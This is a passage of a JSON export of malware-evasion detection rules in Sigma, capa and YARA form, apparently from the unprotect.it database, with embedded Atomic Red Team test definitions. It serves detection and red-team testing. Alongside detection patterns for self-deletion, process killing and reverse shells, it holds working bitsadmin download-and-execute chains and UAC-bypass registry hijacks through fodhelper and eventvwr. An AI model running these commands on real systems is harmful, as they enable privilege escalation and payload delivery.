            "rule": "title: Hide copy and delete itself\r\nstatus: experimental\r\ndescription: Hide copy via attrib.exe and delete itself\r\nauthor: Joe Security\r\ndate: 2019-11-12\r\nid: 200025\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*attrib +s +h *timeout /t *del /f /q*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "hide_in_aoppdata",
            "rule": "title: Copy itself to suspicious location via type command \r\nstatus: experimental\r\ndescription: Copy itself to suspicious location via type command\r\nauthor: Joe Security\r\ndate: 2020-02-13\r\nid: 200052\r\nthreatname:\r\nbehaviorgroup: 10\r\nclassification: 1\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*type*>*\\AppData*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "kill_process",
            "rule": "title: Kill multiple process\r\nstatus: experimental\r\ndescription: Kill multiple process\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200039\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "kill_process",
            "rule": "rule:\r\n  meta:\r\n    name: reference analysis tools strings\r\n    namespace: anti-analysis\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: file\r\n    mbc:\r\n      - Discovery::Analysis Tool Discovery::Process Detection [B0013.001]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiAnalysis/process.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_\r\n  features:\r\n    - or:\r\n      - string: /ollydbg.exe/i\r\n      - string: /ProcessHacker.exe/i\r\n      - string: /tcpview.exe/i\r\n      - string: /autoruns.exe/i\r\n      - string: /autorunsc.exe/i\r\n      - string: /filemon.exe/i\r\n      - string: /procmon.exe/i\r\n      - string: /regmon.exe/i\r\n      - string: /procexp.exe/i\r\n      - string: /idaq.exe/i\r\n      - string: /idaq64.exe/i\r\n      - string: /ImmunityDebugger.exe/i\r\n      - string: /Wireshark.exe/i\r\n      - string: /dumpcap.exe/i\r\n      - string: /HookExplorer.exe/i\r\n      - string: /ImportREC.exe/i\r\n      - string: /PETools.exe/i\r\n      - string: /LordPE.exe/i\r\n      - string: /SysInspector.exe/i\r\n      - string: /proc_analyzer.exe/i\r\n      - string: /sysAnalyzer.exe/i\r\n      - string: /sniff_hit.exe/i\r\n      - string: /windbg.exe/i\r\n      - string: /joeboxcontrol.exe/i\r\n      - string: /joeboxserver.exe/i\r\n      - string: /ResourceHacker.exe/i\r\n      - string: /x32dbg.exe/i\r\n      - string: /x64dbg.exe/i\r\n      - string: /Fiddler.exe/i\r\n      - string: /httpdebugger.exe/i\r\n      - string: /fakenet.exe/i\r\n      - string: /netmon.exe/i\r\n      - string: /WPE PRO.exe/i\r\n      - string: /decompile.exe/i"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "localsize",
            "rule": "rule:\r\n  meta:\r\n    name: trap debugger with localsize\r\n    namespace: anti-analysis/anti-debugging\r\n    author: lordtmk@protonmail.com\r\n    scope: basic block\r\n    examples:\r\n      - B67E5B1985742F62785122B637EF4FBD:0x4B1F5B\r\n  features:\r\n    - and:\r\n      - api: LocalSize\r\n      - mnemonic: push \r\n      - number: 0"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "lolbins",
            "rule": "attack_technique: T1197\r\ndisplay_name: BITS Jobs\r\natomic_tests:\r\n- name: Bitsadmin Download (cmd)\r\n  auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to download\r\n    and execute a payload\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: '%temp%\\bitsadmin1_flag.ps1'\r\n  executor:\r\n    command: |\r\n      bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}\r\n    cleanup_command: |\r\n      del #{local_file} >nul 2>&1\r\n    name: command_prompt\r\n- name: Bitsadmin Download (PowerShell)\r\n  auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to download\r\n    and execute a payload leveraging PowerShell\r\n\r\n    Upon execution you will find a github markdown file downloaded to the Temp directory\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: $env:TEMP\\bitsadmin2_flag.ps1\r\n  executor:\r\n    command: |\r\n      Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}\r\n    cleanup_command: |\r\n      Remove-Item #{local_file} -ErrorAction Ignore\r\n    name: powershell\r\n- name: Persist, Download, & Execute\r\n  auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps.\r\n    Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable.\r\n    This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of \"svchost.exe\" and an Initiating Process Command Line of \"svchost.exe -k netsvcs -p -s BITS\"\r\n    This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    command_path:\r\n      description: Path of command to execute\r\n      type: path\r\n      default: C:\\Windows\\system32\\notepad.exe\r\n    bits_job_name:\r\n      description: Name of BITS job\r\n      type: string\r\n      default: AtomicBITS\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: '%temp%\\bitsadmin3_flag.ps1'\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n  executor:\r\n    command: |\r\n      bitsadmin.exe /create #{bits_job_name}\r\n      bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}\r\n      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} \"\"\r\n      bitsadmin.exe /resume #{bits_job_name}\r\n      timeout 5\r\n      bitsadmin.exe /complete #{bits_job_name}\r\n    cleanup_command: |\r\n      del #{local_file} >nul 2>&1\r\n    name: command_prompt\r\n- name: Bits download using destktopimgdownldr.exe (cmd)\r\n  auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114\r\n  description: |\r\n    This test simulates using destopimgdwnldr.exe to download a malicious file\r\n    instead of a desktop or lockscreen background img. The process that actually makes \r\n    the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) \r\n    and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    download_path:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: 'SYSTEMROOT=C:\\Windows\\Temp'\r\n    cleanup_path:\r\n      description: path to delete file as part of cleanup_command\r\n      type: path\r\n      default: C:\\Windows\\Temp\\Personalization\\LockScreenImage\r\n    cleanup_file:\r\n      description: file to remove as part of cleanup_command\r\n      type: string\r\n      default: \"*.md\"\r\n  executor:\r\n    command: |\r\n      set \"#{download_path}\" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr\r\n    cleanup_command: |\r\n      del #{cleanup_path}\\#{cleanup_file} >null 2>&1\r\n    name: command_prompt"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "mouse_cursor",
            "rule": "rule:\r\n  meta:\r\n    name: check for unmoving mouse cursor\r\n    namespace: anti-analysis/anti-vm/vm-detection\r\n    author: BitsOfBinary\r\n    scope: function\r\n    att&ck:\r\n      - Defense Evasion::Virtualization/Sandbox Evasion::User Activity Based Checks [T1497.002]\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Virtual Machine Detection::Human User Check [B0009.012]\r\n    references:\r\n      - https://www.joesecurity.org/blog/5852460122427342172\r\n    examples:\r\n      - 7E17F0F35D50F49407841372F24FBD38:0x4010f6\r\n  features:\r\n    - and:\r\n      - count(api(user32.GetCursorPos)): 2 or more"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "ntglobalflag",
            "rule": "rule:\r\n  meta:\r\n    name: check for PEB NtGlobalFlag flag\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: moritz.raabe@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Process Environment Block NtGlobalFlag [B0001.036]\r\n    references:\r\n      - Practical Malware Analysis, Chapter 16, p. 355\r\n      - https://www.geoffchappell.com/studies/windows/win32/ntdll/structs/peb/index.htm\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-01.exe_:0x403530\r\n  features:\r\n    - and:\r\n      - basic block:\r\n        - and:\r\n          - match: PEB access\r\n          - or:\r\n            - or:\r\n              - offset/x32: 0x68 = PEB.NtGlobalFlag\r\n              - offset/x64: 0xBC = PEB.NtGlobalFlag\r\n            - and:\r\n              - mnemonic: add\r\n              - or:\r\n                - number/x32: 0x68 = PEB.NtGlobalFlag\r\n                - number/x64: 0xBC = PEB.NtGlobalFlag\r\n      - number: 0x70 = (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS)"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "onset_delay",
            "rule": "title: Powershell delayed execution via ping command\r\nstatus: experimental\r\ndescription: Powershell delayed execution via ping command\r\nauthor: Joe Security\r\ndate: 2020-03-17\r\nid: 200066\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*ping -n * & powershell.exe -executionpolicy bypass -noninteractive -windowstyle hidden*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "output_debug_string",
            "rule": "rule:\r\n  meta:\r\n    name: check for OutputDebugString error\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::OutputDebugString [B0001.016]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-02.exe_:0x401020\r\n  features:\r\n    - and:\r\n      - api: kernel32.SetLastError\r\n      - api: kernel32.GetLastError\r\n      - api: kernel32.OutputDebugString"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "process_reimaging",
            "rule": "action: global\r\ntitle: Defense evasion via process reimaging\r\nid: 7fa4f550-850e-4117-b543-428c86ebb849\r\ndescription: Detects process reimaging defense evasion technique\r\nstatus: experimental\r\nauthor: Alexey Balandin, oscd.community\r\nreferences:\r\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/\r\ntags:\r\n    - attack.defense_evasion\r\ndate: 2019/10/25\r\ndetection:\r\n    condition: all of them\r\nfalsepositives:\r\n    - unknown\r\nlevel: high\r\n---\r\nlogsource:\r\n    product: windows\r\n    service: sysmon\r\ndetection:\r\n    selection1:\r\n        category: process_creation\r\nfields:\r\n    - Image\r\n    - OriginalFileName\r\n    - ParentProcessGuid\r\nnew_fields:\r\n    - ImageFileName\r\n---\r\nlogsource:\r\n    product: windows\r\n    service: sysmon\r\ndetection:\r\n    selection2:\r\n        EventID: 11\r\nfields:\r\n    - ProcessGuid\r\n    - TargetFilename"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "QueryPerformanceCounter",
            "rule": "rule:\r\n  meta:\r\n    name: check for time delay via QueryPerformanceCounter\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::Timing/Delay Check QueryPerformanceCounter [B0001.033]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-03.exe_:0x4011e0\r\n  features:\r\n    - and:\r\n      - count(api(kernel32.QueryPerformanceCounter)): 2 or more"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "sandbox_name",
            "rule": "rule:\r\n  meta:\r\n    name: check for sandbox username\r\n    namespace: anti-analysis/anti-vm/vm-detection\r\n    author: \"@_re_fox\"\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Virtual Machine Detection [B0009]\r\n    examples:\r\n      - ccbf7cba35bab56563c0fbe4237fdc41:0x402B90\r\n    references:\r\n      - https://github.com/LloydLabs/wsb-detect\r\n  features:\r\n    - and:\r\n      - api: GetUserName\r\n      - or:\r\n        - string: /MALTEST/i\r\n          description: Betabot Username Check\r\n        - string: /TEQUILABOOMBOOM/i\r\n          description: VirusTotal Sandbox\r\n        - string: /SANDBOX/i\r\n          description: Gookit Username Check\r\n        - string: /^VIRUS/i\r\n          description: Satan Username Check\r\n        - string: /MALWARE/i\r\n          description: Betabot Username Check\r\n        - string: /SAND\\sBOX/i\r\n          description: Betabot Username Check\r\n        - string: /Test\\sUser/i\r\n          description: Betabot Username Check\r\n        - string: /CurrentUser/i\r\n          description: Gookit Username Check\r\n        - string: /7SILVIA/i\r\n          description: Gookit Username Check\r\n        - string: /FORTINET/i\r\n          description: Shifu Username Check\r\n        - string: /John\\sDoe/i\r\n          description: Emotet Username Check\r\n        - string: /Emily/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /HANSPETER\\-PC/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /HAPUBWS/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /Hong\\sLee/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /IT\\-ADMIN/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /JOHN\\-PC/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /Johnson/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /Miller/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /MUELLER\\-PC/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /Peter\\sWilson/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /SystemIT/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /Timmy/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /WIN7\\-TRAPS/i\r\n          description: Trickbot Downloader Username Check\r\n        - string: /WDAGUtilityAccount/i\r\n          description: Windows Defender Application Guard"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "SetHandleInformation",
            "rule": "rule:\r\n  meta:\r\n    name: check for protected handle exception\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::SetHandleInformation [B0001.024]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/SetHandleInformation_API.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_:0x430D20\r\n  features:\r\n    - and:\r\n      - basic block:\r\n        - and:\r\n          - count(number(2)): 2 or more\r\n          - api: SetHandleInformation\r\n      - api: CloseHandle"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "Shamoon_Wiper",
            "rule": "import \"pe\"\r\n\r\nrule Shamoon2_Wiper {\r\n   meta:\r\n      description = \"Detects Shamoon 2.0 Wiper Component\"\r\n      author = \"Florian Roth\"\r\n      reference = \"https://goo.gl/jKIfGB\"\r\n      date = \"2016-12-01\"\r\n      score = 70\r\n      hash1 = \"c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a\"\r\n      hash2 = \"128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd\"\r\n   strings:\r\n      $a1 = \"\\\\??\\\\%s\\\\System32\\\\%s.exe\" fullword wide\r\n      $x1 = \"IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB\" wide\r\n      $s1 = \"UFWYNYNTS\" fullword wide\r\n      $s2 = \"\\\\\\\\?\\\\ElRawDisk\" fullword wide\r\n   condition:\r\n      ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )\r\n}\r\n\r\nrule EldoS_RawDisk {\r\n   meta:\r\n      description = \"EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)\"\r\n      author = \"Florian Roth (with Binar.ly)\"\r\n      reference = \"https://goo.gl/jKIfGB\"\r\n      date = \"2016-12-01\"\r\n      score = 50\r\n      hash1 = \"47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34\"\r\n      hash2 = \"394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b\"\r\n   strings:\r\n      $s1 = \"g\\\\system32\\\\\" fullword wide\r\n      $s2 = \"ztvttw\" fullword wide\r\n      $s3 = \"lwizvm\" fullword ascii\r\n      $s4 = \"FEJIKC\" fullword ascii\r\n      $s5 = \"INZQND\" fullword ascii\r\n      $s6 = \"IUTLOM\" fullword wide\r\n      $s7 = \"DKFKCK\" fullword ascii\r\n\r\n      $op1 = { 94 35 77 73 03 40 eb e9 }\r\n      $op2 = { 80 7c 41 01 00 74 0a 3d }\r\n      $op3 = { 74 0a 3d 00 94 35 77 }\r\n   condition:\r\n      ( uint16(0) == 0x5a4d and filesize < 2000KB and 4 of them )\r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "spoofed_extension",
            "rule": "title: Execute DLL with spoofed extension\r\nstatus: experimental\r\ndescription: Execute DLL with spoofed extension\r\nauthor: Joe Security\r\ndate: 2020-03-24\r\nid: 200068\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*rundll32*.html,DllRegisterServer*'\r\n              - '*rundll32*.htm,DllRegisterServer*'\r\n              - '*rundll32*.txt,DllRegisterServer*'\r\n              - '*rundll32*.png,DllRegisterServer*'\r\n              - '*rundll32*.jpeg,DllRegisterServer*'\r\n              - '*rundll32*.jpg,DllRegisterServer*'\r\n              - '*regsvr32 c:\\programdata\\\\*.pdf*'\r\n              - '*regsvr32 c:\\programdata\\\\*.txt*'\r\n              - '*regsvr32 c:\\users\\public\\\\*.pdf*'\r\n              - '*regsvr32 c:\\users\\public\\\\*.txt*'\r\n              \r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "stackstring_obf",
            "rule": "rule:\r\n  meta:\r\n    name: contain obfuscated stackstrings\r\n    namespace: anti-analysis/obfuscation/string/stackstring\r\n    author: moritz.raabe@fireeye.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information [T1027]\r\n    mbc:\r\n      - Anti-Static Analysis::Disassembler Evasion::Argument Obfuscation [B0012.001]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-03.exe_:0x4013D0\r\n  features:\r\n    - characteristic: stack string"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "stop_service",
            "rule": "title: Stop multiple services\r\nstatus: experimental\r\ndescription: Stop multiple services\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200040\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*net stop*& net stop*& net stop*& net stop*& net stop*& net stop*& net stop*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "test",
            "rule": "rule:\r\n  meta:\r\n    name: create reverse shell\r\n    namespace: c2/shell\r\n    author: moritz.raabe@fireeye.com\r\n    scope: function\r\n    att&ck:\r\n      - Execution::Command and Scripting Interpreter::Windows Command Shell [T1059.003]\r\n    mbc:\r\n      - Impact::Remote Access::Reverse Shell [B0022.001]\r\n    examples:\r\n      - C91887D861D9BD4A5872249B641BC9F9:0x401A77\r\n  features:\r\n    - or:\r\n      - and:\r\n        - match: create pipe\r\n        - api: kernel32.PeekNamedPipe\r\n        - api: kernel32.CreateProcess\r\n        - api: kernel32.ReadFile\r\n        - api: kernel32.WriteFile\r\n      - and:\r\n        - match: create process\r\n        - match: read pipe\r\n        - match: write pipe\r\n      - and:\r\n        - match: create pipe\r\n        - match: create process\r\n        - basic block:\r\n          - and:\r\n            - count(api(SetHandleInformation)): 2 or more\r\n            - number: 1 = HANDLE_FLAG_INHERIT"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "timestomp",
            "rule": "rule:\r\n  meta:\r\n    name: timestomp file\r\n    namespace: anti-analysis/anti-forensic/timestomp\r\n    author: moritz.raabe@fireeye.com\r\n    scope: function\r\n    att&ck:\r\n      - Defense Evasion::Indicator Removal on Host::Timestomp [T1070.006]\r\n    examples:\r\n      - Practical Malware Analysis Lab 03-04.exe_:0x4014e0\r\n  features:\r\n    - and:\r\n      - or:\r\n        - api: kernel32.GetSystemTime\r\n        - api: kernel32.FileTimeToLocalFileTime\r\n        - api: kernel32.GetSystemTimeAsFileTime\r\n        - api: kernel32.SystemTimeToFileTime\r\n        - api: kernel32.GetFileTime\r\n      - api: kernel32.SetFileTime"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "uac_bypass",
            "rule": "title: Fodhelper UAC Bypass\r\nstatus: experimental\r\ndescription: Fodhelper UAC Bypass\r\nauthor: Joe Security\r\ndate: 2020-07-30\r\nid: 200082\r\nthreatname:\r\nbehaviorgroup: 26\r\nclassification: 7\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*reg add*hkcu\\software\\classes\\ms-settings\\shell\\open\\command*'\r\n      condition: selection\r\nlevel: critical\r\nattack_technique: T1548.002\r\ndisplay_name: 'Abuse Elevation Control Mechanism: Bypass User Access Control'\r\natomic_tests:\r\n- name: Bypass UAC using Event Viewer (cmd)\r\n  auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9\r\n  description: |\r\n    Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n    Upon execution command prompt should be launched with administrative privelages\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n      cmd.exe /c eventvwr.msc\r\n    cleanup_command: |\r\n      reg.exe delete hkcu\\software\\classes\\mscfile /f >nul 2>&1\r\n    name: command_prompt\r\n- name: Bypass UAC using Event Viewer (PowerShell)\r\n  auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b\r\n  description: |\r\n    PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n    Upon execution command prompt should be launched with administrative privelages\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\eventvwr.msc\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\mscfile\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n- name: Bypass UAC using Fodhelper\r\n  auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182\r\n  description: |\r\n    Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\r\n    Upon execution, \"The operation completed successfully.\" will be shown twice and command prompt will be opened.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n      reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\n      fodhelper.exe\r\n    cleanup_command: |\r\n      reg.exe delete hkcu\\software\\classes\\ms-settings /f >nul 2>&1\r\n    name: command_prompt\r\n- name: Bypass UAC using Fodhelper - PowerShell\r\n  auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa\r\n  description: |\r\n    PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\r\n    Upon execution command prompt will be opened.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n      New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\fodhelper.exe\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n- name: Bypass UAC using ComputerDefaults (PowerShell)\r\n  auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f\r\n  description: |\r\n    PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10\r\n    Upon execution administrative command prompt should open\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n      New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n    elevation_required: true\r\n- name: Bypass UAC by Mocking Trusted Directories\r\n  auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1\r\n  description: |\r\n    Creates a fake \"trusted directory\" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems\r\n    Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      mkdir 